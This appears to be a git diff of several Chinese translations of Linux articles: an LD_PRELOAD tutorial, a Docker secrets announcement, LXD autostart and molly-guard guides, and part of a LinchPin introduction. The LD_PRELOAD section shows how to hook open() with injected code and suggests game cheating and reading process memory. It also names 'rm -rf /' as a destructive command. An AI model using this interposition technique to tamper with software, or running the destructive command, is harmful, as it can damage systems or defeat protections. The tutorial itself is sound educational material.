正如你看到的输出那样,它列出了被程序 `random_nums` 所需要的库的列表。这个列表是构建进可执行程序中的,并且它是在编译时决定的。在你的机器上的精确的输出可能与示例有所不同,但是,一个 **libc.so** 肯定是有的 – 这个文件提供了核心的 C 函数。它包含了 “真正的” rand()。
|
||||
|
||||
我使用下列的命令可以得到一个全部的函数列表,我们看一看 libc 提供了哪些函数:
|
||||
|
||||
> ```
|
||||
> nm -D /lib/libc.so.6
|
||||
> ```
|
||||
|
||||
这个 _nm_ 命令列出了在一个二进制文件中找到的符号。-D 标志告诉它去查找动态符号,因此 libc.so.6 是一个动态库。这个输出是很长的,但它确实在很多的其它标准函数中列出了 rand()。
|
||||
|
||||
现在,在我们设置了环境变量 LD_PRELOAD 后发生了什么?这个变量 **为一个程序强制加载一些库**。在我们的案例中,它为 `random_num` 加载了 _unrandom.so_,尽管程序本身并没有这样去要求它。下列的命令可以看得出来:
|
||||
|
||||
> ```
|
||||
> $ LD_PRELOAD=$PWD/unrandom.so ldd random_num
|
||||
> linux-vdso.so.1 => (0x00007fff369dc000)
|
||||
> /some/path/to/unrandom.so (0x00007f262b439000)
|
||||
> libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f262b044000)
|
||||
> /lib64/ld-linux-x86-64.so.2 (0x00007f262b63d000)
|
||||
> ```
|
||||
|
||||
注意,它列出了我们当前的库。实际上这就是代码为什么被运行的原因:`random_num` 调用了 rand(),但是,如果 `unrandom.so` 被加载,它调用的是我们提供的实现了 rand() 的库。很清楚吧,不是吗?
|
||||
|
||||
#### 更清楚地了解
|
||||
|
||||
这还不够。我可以用相似的方式注入一些代码到一个应用程序中,并且用这种方式它能够使用函数正常工作。如果我们使用一个简单的 “return 0” 去实现 open() 你就明白了。我们看到这个应用程序就像发生了故障一样。这是 **显而易见的**, 真实地去调用原始的 open:
|
||||
|
||||
inspect_open.c:
|
||||
```
|
||||
int open(const char *pathname, int flags){
|
||||
/* Some evil injected code goes here. */
|
||||
return open(pathname,flags); // Here we call the "real" open function, that is provided to us by libc.so
|
||||
}
|
||||
```
|
||||
|
||||
嗯,不完全是。这将去调用 “原始的” open(…)。显然,这是一个无休止的回归调用。
|
||||
|
||||
怎么去访问这个 “真正的” open 函数呢?它需要去使用程序接口进行动态链接。它听起来很简单。我们来看一个完整的示例,然后,我将详细解释到底发生了什么:
|
||||
|
||||
inspect_open.c:
|
||||
|
||||
```
|
||||
#define _GNU_SOURCE
|
||||
#include <dlfcn.h>
|
||||
|
||||
typedef int (*orig_open_f_type)(const char *pathname, int flags);
|
||||
|
||||
int open(const char *pathname, int flags, ...)
|
||||
{
|
||||
/* Some evil injected code goes here. */
|
||||
|
||||
orig_open_f_type orig_open;
|
||||
orig_open = (orig_open_f_type)dlsym(RTLD_NEXT,"open");
|
||||
return orig_open(pathname,flags);
|
||||
}
|
||||
```
|
||||
|
||||
_dlfcn.h_ 是被 _dlsym_ 函数所需要,我们在后面会用到它。那个奇怪的 _#define_ 是命令编译器去允许一些非标准的东西,我们需要它去启用 _dlfcn.h_ 中的 `RTLD_NEXT`。那个 typedef 只是创建了一个函数指针类型的别名,它的参数是原始的 open – 别名是 `orig_open_f_type`,我们将在后面用到它。
|
||||
|
||||
我们定制的 open(…) 的主体是由一些代码构成。它的最后部分创建了一个新的函数指针 `orig_open`,它指向原始的 open(…) 函数。为了得到那个函数的地址,我们请求 _dlsym_ 去为我们查找,接下来的 “open” 函数在动态库栈上。最后,我们调用了那个函数(传递了与我们的假冒 ”open" 一样的参数),并且返回它的返回值。
|
||||
|
||||
我使用下面的内容作为我的 “邪恶的注入代码”:
|
||||
|
||||
inspect_open.c (fragment):
|
||||
|
||||
```
|
||||
printf("The victim used open(...) to access '%s'!!!\n",pathname); //remember to include stdio.h!
|
||||
```
|
||||
|
||||
去完成它,我需要稍微调整一下编译参数:
|
||||
|
||||
> ```
|
||||
> gcc -shared -fPIC inspect_open.c -o inspect_open.so -ldl
|
||||
> ```
|
||||
|
||||
我增加了 _-ldl_ ,因此,它将共享库连接 _libdl_ ,它提供了 _dlsym_ 函数。(不,我还没有创建一个假冒版的 _dlsym_ ,不过这样更有趣)
|
||||
|
||||
因此,结果是什么呢?一个共享库,它实现了 open(…) 函数,除了它 _输出_ 文件路径以外,其它的表现和真正的 open(…) 函数 **一模一样**。:-)
|
||||
|
||||
如果这个强大的诀窍还没有说服你,是时候去尝试下面的这个示例了:
|
||||
|
||||
> ```
|
||||
> LD_PRELOAD=$PWD/inspect_open.so gnome-calculator
|
||||
> ```
|
||||
|
||||
我鼓励你去看自己实验的结果,但是基本上,它实时列出了这个应用程序可以访问到的每个文件。
|
||||
|
||||
我相信它并不难去想像,为什么这可以用于去调试或者研究未知的应用程序。请注意,那只是部分的诀窍,并不是全部,因此 _open()_ 不仅是一个打开文件的函数 … 例如,在标准库中也有一个 _open64()_ ,并且为了完整地研究,你也需要为它去创建一个假冒的。
|
||||
|
||||
#### **可能的用法**
|
||||
|
||||
如果你一直跟着我享受上面的过程,让我推荐一个使用这个诀窍能做什么的一大堆创意。记住,你可以在不损害原始应用程序的同时做任何你想做的事情!
|
||||
|
||||
1. ~~获得 root 权限~~ 你想多了!你不会通过这种方法绕过安全机制的。(一个专业的解释是:如果 ruid != euid,库不会通过这种方法预加载的。)
|
||||
|
||||
2. 欺骗游戏:**取消随机化** 这是我演示的第一个示例。对于一个完整的工作案例,你将需要去实现一个定制的 `random()` 、`rand_r()`、`random_r()`,也有一些应用程序是从`/dev/urandom` 中读取,或者,因此你可以通过使用一个修改的文件路径去运行原始的 `open()` 重定向它们到 `/dev/null`。而且,一些应用程序可能有它们自己的随机数生成算法,这种情况下你似乎是没有办法的(除非,按下面的第 10 点去操作)。但是对于一个新手来说,它看起来并不容易上手。
|
||||
|
||||
3. 欺骗游戏:**子弹时间** 实现所有的与标准时间有关的函数,让假冒的时间变慢两倍,或者十倍。如果你为时间测量正确地计算了新值,与时间相关的 `sleep` 函数、和其它的、受影响的应用程序将相信这个时间,(根据你的愿望)运行的更慢(或者更快),并且,你可以体验可怕的 “子弹时间” 的动作。或者 **甚至更进一步**,让你的共享库也可以成为一个 DBus 客户端,因此你可以使用它进行实时的通讯。绑定一些快捷方式到定制的命令,并且在你的假冒的时间函数上使用一些额外的计算,让你可以有能力按你的意愿去启用&禁用慢进或者快进任何时间。
|
||||
|
||||
4. 研究应用程序:**列出访问的文件** 它是我演示的第二个示例,但是这也可以进一步去深化,通过记录和监视所有应用程序的文件 I/O。
|
||||
|
||||
5. 研究应用程序:**监视因特网访问** 你可以使用 Wireshark 或者类似软件达到这一目的,但是,使用这个诀窍你可以真实地获得控制应用程序基于 web 发送了什么,而不仅是看看,但是也会影响到数据的交换。这里有很多的可能性,从检测间谍软件到欺骗多用户游戏,或者分析&& 逆向工程使用闭源协议的应用程序。
|
||||
|
||||
6. 研究应用程序:**检查 GTK 结构** 为什么只局限于标准库?让我们在所有的 GTK 调用中注入一些代码,因此我们可以学习到一个应用程序使用的那些我们并不知道的玩意儿,并且,知道它们的构成。然后这可以渲染出一个图像或者甚至是一个 gtkbuilder 文件!如果你想去学习怎么去做一些应用程序的接口管理,这个方法超级有用!
|
||||
|
||||
7. **在沙盒中运行不安全的应用程序** 如果你不信任一些应用程序,并且你可能担心它会做一些如 `rm -rf /`或者一些其它的不希望的文件激活,你可以通过修改它传递到所有文件相关的函数(不仅是 _open_ ,它也可以删除目录),去重定向它所有的文件 I/O 到诸如 `/tmp` 这里。还有更难的如 chroot 的诀窍,但是它也给你提供更多的控制。它会和完全 “封装” 一样安全,并且除了你真正知道做了什么以外,这种方法不会真实的运行任何恶意软件。
|
||||
|
||||
8. **实现特性** [zlibc][1] 是明确以这种方法运行的一个真实的库;它可以在访问时解压文件,因此,任何应用程序都可以在无需实现解压功能的情况下访问压缩数据。
|
||||
|
||||
9. **修复 bugs** 另一个现实中的示例是:不久前(我不确定现在是否仍然如此)Skype – 它是闭源的软件 – 从某些网络摄像头中捕获视频有问题。因为 Skype 并不是自由软件,源文件不能被修改,就可以通过使用预加载一个解决了这个问题的库的方式来修复这个 bug。
|
||||
|
||||
10. 手工方式 **访问应用程序拥有的内存**。请注意,你可以通过这种方式去访问所有应用程序的数据。如果你有类似的软件,如 CheatEngine/scanmem/GameConqueror 这可能并不会让人惊讶,但是,它们都要求 root 权限才能工作。LD_PRELOAD 不需要。事实上,通过一些巧妙的诀窍,你注入的代码可以访问任何应用程序的内存,从本质上看,是因为它是通过应用程序自身来得以运行的。你可以在应用程序可以达到的范围之内通过修改它做任何的事情。你可以想像一下,它允许你做许多的低级别的侵入 … ,但是,关于这个主题,我将在某个时候写一篇关于它的文章。
|
||||
|
||||
这里仅是一些我想到的创意。我希望你能找到更多,如果你做到了 – 通过下面的评论区共享出来吧!
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/
|
||||
|
||||
作者:[Rafał Cieślak][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://rafalcieslak.wordpress.com/
|
||||
[1]:http://www.zlibc.linux.lu/index.html
|
||||
|
||||
|
@ -0,0 +1,111 @@
|
||||
|
||||
Dockers 涉密数据(Secrets) 管理介绍
|
||||
====================================
|
||||
|
||||
容器正在改变我们对应用程序和基础设施的看法。无论容器内的代码量是大还是小,容器架构都会引起代码如何与硬件相互作用方式的改变 —— 它从根本上将其从基础设施中抽象出来。对于容器安全来说,在 Docker 中,容器的安全性有三个关键组成部分,他们相互作用构成本质上更安全的应用程序。
|
||||
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1)
|
||||
|
||||
构建更安全的应用程序的一个关键因素是与其他应用程序和系统进行安全通信,这通常需要证书、tokens、密码和其他类型的验证信息凭证 —— 通常称为应用程序涉密数据。我们很高兴可以推出 Docker 涉密数据,一个容器的原生解决方案,它是加强容器安全的可信赖交付组件,用户可以在容器平台上直接集成涉密数据分发功能。
|
||||
|
||||
有了容器,现在应用程序在多环境下是动态的、可移植的。这使得现存的涉密数据分发的解决方案略显不足,因为它们都是针对静态环境。不幸的是,这导致了应用程序涉密数据应用不善管理的增加,使得不安全的本地解决方案变得十分普遍,比如像 GitHub 嵌入涉密数据到版本控制系统,或者在这之后考虑了其他同样不好的解决方案。
|
||||
|
||||
### Docker 涉密数据(Secrets) 管理介绍
|
||||
|
||||
根本上我们认为,如果有一个标准的接口来访问涉密数据,应用程序就更安全了。任何好的解决方案也必须遵循安全性实践,例如在传输的过程中,对涉密数据进行加密;在空闲的时候也对涉密数据 进行加密;防止涉密数据在应用最终使用时被无意泄露;并严格遵守最低权限原则,即应用程序只能访问所需的涉密数据,不能多也不能不少。
|
||||
|
||||
通过将涉密数据整合到 docker 的业务流程,我们能够在遵循这些确切的原则下为涉密数据的管理问题提供一种解决方案。
|
||||
|
||||
下图提供了一个高层次视图,并展示了 Docker swarm mode 体系架构是如何将一种新类型的对象 —— 一个涉密数据对象,安全地传递给我们的容器。
|
||||
|
||||
![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1)
|
||||
|
||||
在 Docker 中,一个涉密数据是任意的数据块,比如密码、SSH 密钥、TLS 凭证,或者任何其他本质上敏感的数据。当你将一个涉密数据加入集群(通过执行 `docker secret create` )时,利用在引导新集群时自动创建的内置证书颁发机构,Docker 通过相互认证的 TLS 连接将密钥发送给集群管理器。
|
||||
|
||||
```
|
||||
$ echo "This is a secret" | docker secret create my_secret_data -
|
||||
```
|
||||
|
||||
一旦,涉密数据到达一个管理节点,它将被保存到内部的 Raft 存储区中,该存储区使用 NACL 开源加密库中的 Salsa20、Poly1305 加密算法生成的 256 位密钥进行加密。以确保没有任何数据被永久写入未加密的磁盘。向内部存储写入涉密数据,给予了涉密数据跟其他集群数据一样的高可用性。
|
||||
|
||||
当集群管理器启动时,包含涉密数据的被加密过的 Raft 日志通过每一个节点唯一的数据密钥进行解密。此密钥以及用于与集群其余部分通信的节点的 TLS 证书可以使用一个集群范围的加密密钥进行加密。该密钥称为“解锁密钥”,也使用 Raft 进行传播,并且会在管理器启动的时候被使用。
|
||||
|
||||
当授予新创建或运行的服务权限访问某个涉密数据时,其中一个管理器节点(只有管理人员可以访问被存储的所有涉密数据),将已建立的 TLS 连接分发给正在运行特定服务的节点。这意味着节点自己不能请求涉密数据,并且只有在管理员提供给他们的时候才能访问这些涉密数据 —— 严格地控制请求涉密数据的服务。
|
||||
|
||||
```
|
||||
$ docker service create --name="redis" --secret="my_secret_data" redis:alpine
|
||||
```
|
||||
|
||||
未加密的涉密数据被挂载到一个容器,该容器位于 `/run/secrets/<secret_name>` 的内存文件系统中。
|
||||
|
||||
```
|
||||
$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets
|
||||
total 4
|
||||
-r--r--r-- 1 root root 17 Dec 13 22:48 my_secret_data
|
||||
```
|
||||
|
||||
如果一个服务被删除或者被重新安排在其他地方,集群管理器将立即通知所有不再需要访问该涉密数据的节点,这些节点将不再有权访问该应用程序的涉密数据。
|
||||
|
||||
```
|
||||
$ docker service update --secret-rm="my_secret_data" redis
|
||||
|
||||
$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data
|
||||
|
||||
cat: can't open '/run/secrets/my_secret_data': No such file or directory
|
||||
```
|
||||
|
||||
查看 Docker secret 文档以获取更多信息和示例,了解如何创建和管理您的涉密数据。同时,特别感谢 Docker 安全团队的 Laurens Van Houtven (https://www.lvh.io/) 以及使这一特性成为现实的团队。
|
||||
|
||||
[Get safer apps for dev and ops w/ new #Docker secrets management][5]
|
||||
|
||||
[CLICK TO TWEET][6]
|
||||
|
||||
###
|
||||
![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1)
|
||||
|
||||
### 通过 Docker 更安全地使用应用程序
|
||||
|
||||
Docker 涉密数据旨在让开发人员和 IT 运营团队可以轻松使用,以用于构建和运行更安全的应用程序。它是首个被设计为既能保持涉密数据安全、又能仅让真正需要它们的容器使用的容器架构。从使用 Docker Compose 定义应用程序和涉密数据,到 IT 管理人员直接在 Docker Datacenter 中部署的 Compose 文件、涉密数据,networks 和 volumes 都将被加密并安全地跟应用程序一起传输。
|
||||
|
||||
更多相关学习资源:
|
||||
|
||||
* [1.13 Docker 数据中心具有 Secrets, 安全扫描、容量缓存等新特性][7]
|
||||
|
||||
* [下载 Docker ][8] 且开始学习
|
||||
|
||||
* [在 Docker 数据中心尝试使用 secrets][9]
|
||||
|
||||
* [阅读文档][10]
|
||||
|
||||
* 参与 [即将进行的在线研讨会][11]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://blog.docker.com/2017/02/docker-secrets-management/
|
||||
|
||||
作者:[ Ying Li][a]
|
||||
译者:[HardworkFish](https://github.com/HardworkFish)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://blog.docker.com/author/yingli/
|
||||
[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management&summary=Containers%20are%20changing%20how%20we%20view%20apps%20and%20infrastructure.%20Whether%20the%20code%20inside%20containers%20is%20big%20or%20small,%20container%20architecture%20introduces%20a%20change%20to%20how%20that%20code%20behaves%20with%20hardware%20-%20it%20fundamentally%20abstracts%20it%20from%20the%20infrastructure.%20Docker%20believes%20that%20there%20are%20three%20key%20components%20to%20container%20security%20and%20...
|
||||
[2]:http://www.reddit.com/submit?url=http://dockr.ly/2k6gnOB&title=Introducing%20Docker%20Secrets%20Management
|
||||
[3]:https://plus.google.com/share?url=http://dockr.ly/2k6gnOB
|
||||
[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2k6gnOB&t=Introducing%20Docker%20Secrets%20Management
|
||||
[5]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[6]:https://twitter.com/share?text=Get+safer+apps+for+dev+and+ops+w%2F+new+%23Docker+secrets+management+&via=docker&related=docker&url=http://dockr.ly/2k6gnOB
|
||||
[7]:http://dockr.ly/AppSecurity
|
||||
[8]:https://www.docker.com/getdocker
|
||||
[9]:http://www.docker.com/trial
|
||||
[10]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[11]:http://www.docker.com/webinars
|
||||
[12]:https://blog.docker.com/author/yingli/
|
||||
[13]:https://blog.docker.com/tag/container-security/
|
||||
[14]:https://blog.docker.com/tag/docker-security/
|
||||
[15]:https://blog.docker.com/tag/secrets-management/
|
||||
[16]:https://blog.docker.com/tag/security/
|
||||
[17]:https://docs.docker.com/engine/swarm/how-swarm-mode-works/pki/
|
||||
[18]:https://docs.docker.com/engine/swarm/secrets/
|
||||
[19]:https://lvh.io%29/
|
@ -0,0 +1,73 @@
|
||||
如何在 Linux 启动时自动启动 LXD 容器
|
||||
======
|
||||
我正在使用基于 LXD(“Linux 容器”)的虚拟机。如何在 Linux 系统中启动时自动启动 LXD 容器?
|
||||
|
||||
你可以在 LXD 启动后启动容器。你需要将 boot.autostart 设置为 true。你可以使用 boot.autostart.priority(默认值为 0)选项来定义启动容器的顺序(从最高开始)。你也可以使用 boot.autostart.delay(默认值0)选项定义在启动一个容器后等待几秒后启动另一个容器。
|
||||
|
||||
### 语法
|
||||
|
||||
上面讨论的关键字可以使用 lxc 工具用下面的语法来设置:
|
||||
|
||||
```
|
||||
$ lxc config set {vm-name} {key} {value}
|
||||
$ lxc config set {vm-name} boot.autostart {true|false}
|
||||
$ lxc config set {vm-name} boot.autostart.priority integer
|
||||
$ lxc config set {vm-name} boot.autostart.delay integer
|
||||
```
|
||||
|
||||
### 如何在 Ubuntu Linux 16.10 中让 LXD 容器在启动时启动?
|
||||
|
||||
输入以下命令:
|
||||
`$ lxc config set {vm-name} boot.autostart true`
|
||||
设置一个 LXD 容器名称 “nginx-vm” 以在启动时启动
|
||||
`$ lxc config set nginx-vm boot.autostart true`
|
||||
你可以使用以下语法验证设置:
|
||||
```
|
||||
$ lxc config get {vm-name} boot.autostart
|
||||
$ lxc config get nginx-vm boot.autostart
|
||||
```
|
||||
示例输出:
|
||||
```
|
||||
true
|
||||
```
|
||||
|
||||
你可以使用下面的语法在启动容器后等待 10 秒钟后启动另一个容器:
|
||||
`$ lxc config set nginx-vm boot.autostart.delay 10`
|
||||
最后,通过设置最高值来定义启动容器的顺序。确保 db_vm 容器首先启动,然后再启动 nginx_vm。
|
||||
```
|
||||
$ lxc config set db_vm boot.autostart.priority 100
|
||||
$ lxc config set nginx_vm boot.autostart.priority 99
|
||||
```
|
||||
使用[下面的 bash 循环在 Linux 上查看所有][1]值:
|
||||
```
|
||||
#!/bin/bash
|
||||
echo 'The current values of each vm boot parameters:'
|
||||
for c in db_vm nginx_vm memcache_vm
|
||||
do
|
||||
echo "*** VM: $c ***"
|
||||
for v in boot.autostart boot.autostart.priority boot.autostart.delay
|
||||
do
|
||||
echo "Key: $v => $(lxc config get $c $v) "
|
||||
done
|
||||
echo ""
|
||||
done
|
||||
```
|
||||
|
||||
|
||||
示例输出:
|
||||
![Fig.01: Get autostarting LXD containers values using a bash shell script][2]
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/how-to-auto-start-lxd-containers-at-boot-time-in-linux/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/faq/bash-for-loop/
|
||||
[2]:https://www.cyberciti.biz/media/new/faq/2017/02/Autostarting-LXD-containers-values.jpg
|
@ -0,0 +1,114 @@
|
||||
使用 molly-guard 保护你的 Linux/Unix 机器不会被错误地关机/重启
|
||||
======
|
||||
我去!又是这样。 我还以为我登录到家里的服务器呢。 结果 [重启的居然是数据库服务器 ][1]。 另外我也有时会在错误终端内输入 "[shutdown -h 0][2]" 命令。 我知道有些人 [经常会犯这个错误 ][3]。
|
||||
![我的愤怒无从容忍 ][4]
|
||||
有办法解决这个问题吗?我真的只能忍受这种随机重启和关机的痛苦吗? 虽说人总是要犯错的,但总不能一错再错吧。
|
||||
|
||||
最近我在 tweet 上发了一通牢骚:
|
||||
|
||||
> I seems to run into this stuff again and again :( Instead of typing:
|
||||
> sudo virsh reboot d1
|
||||
>
|
||||
> I just typed & rebooted my own box
|
||||
> sudo reboot d1
|
||||
>
|
||||
> -- nixCraft (@nixcraft) [February 19, 2017][5]
|
||||
|
||||
|
||||
结果收到了一些建议。我们来试一下。
|
||||
|
||||
### 向你引荐 molly guard
|
||||
|
||||
Molly-Guard **尝试阻止你不小心关闭或重启 Linux 服务器**。它在 Debian/Ubuntu 中的包描述为:
|
||||
|
||||
> The package installs a shell script that overrides the existing shutdown/reboot/halt/poweroff/coldreboot/pm-hibernate/pm-suspend* commands and first runs a set of scripts, which all have to exit successfully, before molly-guard invokes the real command. One of the scripts checks for existing SSH sessions. If any of the four commands are called interactively over an SSH session, the shell script prompts you to enter the name of the host you wish to shut down. This should adequately prevent you from accidental shutdowns and reboots.
|
||||
|
||||
貌似 [molly-guard][6] 还是个专有名词:
|
||||
|
||||
> A shield to prevent tripping of some Big Red Switch by clumsy or ignorant hands. Originally used of the plexiglass covers improvised for the BRS on an IBM 4341 after a programmer's toddler daughter (named Molly) frobbed it twice in one day. Later generalized to covers over stop/reset switches on disk drives and networking equipment. In hardware catalogues, you'll see the much less interesting description "guarded button".
|
||||
|
||||
### 如何安装 molly guard
|
||||
|
||||
使用 [apt-get command][7] 或者 [apt command][8] 来搜索并安装 molly-guard:
|
||||
```
|
||||
$ apt search molly-guard
|
||||
$ sudo apt-get install molly-guard
|
||||
```
|
||||
结果为:
|
||||
[![Fig.01: Installing molly guard on Linux][9]][10]
|
||||
|
||||
### 测试一下
|
||||
|
||||
输入 [reboot 命令 ][11] 和 shutdown 命令:
|
||||
```
|
||||
$ sudo reboot
|
||||
# reboot
|
||||
$ shutdown -h 0
|
||||
# sudo shutdown -h 0
|
||||
### running wrong command such as follows instead of
|
||||
### sudo virsh reboot vm_name_here
|
||||
$ sudo reboot vm_name_here
|
||||
```
|
||||
结果为:
|
||||
![Fig.02: Molly guard saved my butt ;\)][12]
|
||||
我超级喜欢 molly-guard。因此我将下行内容加入到 apt-debian-ubuntu-common.yml 文件中了:
|
||||
```
|
||||
- apt:
|
||||
name: molly-guard
|
||||
|
||||
```
|
||||
|
||||
是的。我使用 Ansible 在所有的 Debian 和 Ubuntu 服务器上都自动安装上它了。
|
||||
|
||||
**相关** : [My 10 UNIX Command Line Mistakes][13]
|
||||
|
||||
### 如果我的 Linux 发行版或者 Unix 系统(比如 FreeBSD) 没有 molly-guard 怎么办呢?
|
||||
|
||||
不用怕,[设置 shell 别名 ][14]:
|
||||
```
|
||||
## bash shell example ###
|
||||
alias reboot="echo 'Are you sure?' If so, run /sbin/reboot"
|
||||
alias shutdown="echo 'Are you sure?' If so, run /sbin/shutdown"
|
||||
```
|
||||
|
||||
你也可以 [临时取消别名机制运行真正的命令 ][15]。比如要运行 reboot 可以这样:
|
||||
```
|
||||
# \reboot
|
||||
```
|
||||
或者
|
||||
```
|
||||
# /sbin/reboot
|
||||
```
|
||||
另外你也可以写一个 [shell/perl/python 脚本来调用这些命令并要求 ][16] 确认 reboot/halt/shutdown 的选项。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/faq/howto-reboot-linux/
|
||||
[2]:https://www.cyberciti.biz/faq/shutdown-linux-server/
|
||||
[3]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html (My 10 UNIX Command Line Mistakes)
|
||||
[4]:https://www.cyberciti.biz/media/new/cms/2017/02/anger.gif
|
||||
[5]:https://twitter.com/nixcraft/status/833320792880320513
|
||||
[6]:http://catb.org/~esr/jargon/html/M/molly-guard.html
|
||||
[7]://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
|
||||
[8]://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
|
||||
[9]:https://www.cyberciti.biz/media/new/cms/2017/02/install-molly-guard-on-linux.jpg
|
||||
[10]:https://www.cyberciti.biz/hardware/how-to-protects-linux-and-unix-machines-from-accidental-shutdownsreboots-with-molly-guard/attachment/install-molly-guard-on-linux/
|
||||
[11]:https://www.cyberciti.biz/faq/linux-reboot-command/ (See Linux/Unix reboot command examples for more info)
|
||||
[12]:https://www.cyberciti.biz/media/new/cms/2017/02/saved-my-butt.jpg
|
||||
[13]:https://www.cyberciti.biz/tips/my-10-unix-command-line-mistakes.html
|
||||
[14]:https://www.cyberciti.biz/tips/bash-aliases-mac-centos-linux-unix.html
|
||||
[15]:https://www.cyberciti.biz/faq/bash-shell-temporarily-disable-an-alias/
|
||||
[16]:https://github.com/kjetilho/clumsy_protect
|
||||
[17]:https://twitter.com/nixcraft
|
||||
[18]:https://facebook.com/nixcraft
|
||||
[19]:https://plus.google.com/+CybercitiBiz
|
@ -1,393 +0,0 @@
|
||||
LinchPin:一个使用 Ansible 的简化的编排工具
|
||||
============================================================
|
||||
|
||||
### 2016年开始的 LinchPin,现在已经拥有一个 Python API 和一个成长中的社区。
|
||||
|
||||
|
||||
![LinchPin 1.0:一个使用 Ansible 的成熟的混合云编排工具](https://opensource.com/sites/default/files/styles/image-full-size/public/images/business/toolbox-learn-draw-container-yearbook.png?itok=2XFy0htN "LinchPin 1.0: A maturing hybrid cloud orchestration tool using Ansible")
|
||||
>Image by : [Internet Archive Book Images][10]. Modified by Opensource.com. CC BY-SA 4.0
|
||||
|
||||
过去的一年里,[我的团队公布了][11] [LinchPin][12],一个使用 Ansible 的混合[云][13]编排工具。准备云资源从来没有这么容易或更快。Ansible 强力支持的 LinchPin,专注于简化,在用户指尖下,将有更多的可用云资源。在这篇文章中,我将介绍 LinchPin,并且去看看过去的 10 个月,有多少成熟的项目。
|
||||
|
||||
LinchPin 刚被引入的时候,使用 **ansible-playbook** 命令去运行 LinchPin ,虽然可以完成,但是还是很复杂的,LinchPin 现在有一个前端命令行用户界面(CLI),它是在 [Click][14] 中写的,而且它使 LinchPin 比以前更简单。
|
||||
|
||||
探索开源云
|
||||
|
||||
* [云是什么?][1]
|
||||
|
||||
* [OpenStack 是什么?][2]
|
||||
|
||||
* [Kubernetes 是什么?][3]
|
||||
|
||||
* [为什么操作系统对容器很重要?][4]
|
||||
|
||||
* [保持 Linux 容器的安全][5]
|
||||
|
||||
为了不落后于 CLI,LinchPin 现在也有一个 [Python][15] API,它可以被用于管理资源,比如,Amazon EC2 和 OpenStack 实例、网络、存储、安全组、等等。这个 API [文档][16] 可以在你想去尝试 LinchPin 的 Python API 时帮助你。
|
||||
|
||||
### Playbooks 作为一个库
|
||||
|
||||
因为 LinchPin 的核心 bits 是 [Ansible playbooks][17]、角色、模块、过滤器,以及任何被称为 Ansible 模块的东西都被移进 LinchPin 库中,这意味着我们可以直接调用 playbooks,但它不是资源管理的首选机制。**linchpin** 可执行文件已经成为命令行的事实上的前端。
|
||||
|
||||
### 深入了解命令行
|
||||
|
||||
让我们深入了解**linchpin**命令行:
|
||||
|
||||
```
|
||||
$ linchpin
|
||||
Usage: linchpin [OPTIONS] COMMAND [ARGS]...
|
||||
|
||||
linchpin: hybrid cloud orchestration
|
||||
|
||||
Options:
|
||||
-c, --config PATH Path to config file
|
||||
-w, --workspace PATH Use the specified workspace if the familiar Jenkins
|
||||
$WORKSPACE environment variable is not set
|
||||
-v, --verbose Enable verbose output
|
||||
--version Prints the version and exits
|
||||
--creds-path PATH Use the specified credentials path if WORKSPACE
|
||||
environment variable is not set
|
||||
-h, --help Show this message and exit.
|
||||
|
||||
Commands:
|
||||
init Initializes a linchpin project.
|
||||
up Provisions nodes from the given target(s) in...
|
||||
destroy Destroys nodes from the given target(s) in...
|
||||
```
|
||||
|
||||
你可以立即看到一个简单的描述,以及命令的选项和参数。这个帮助的最下面的三个命令是本文的重点内容。
|
||||
|
||||
### 配置
|
||||
|
||||
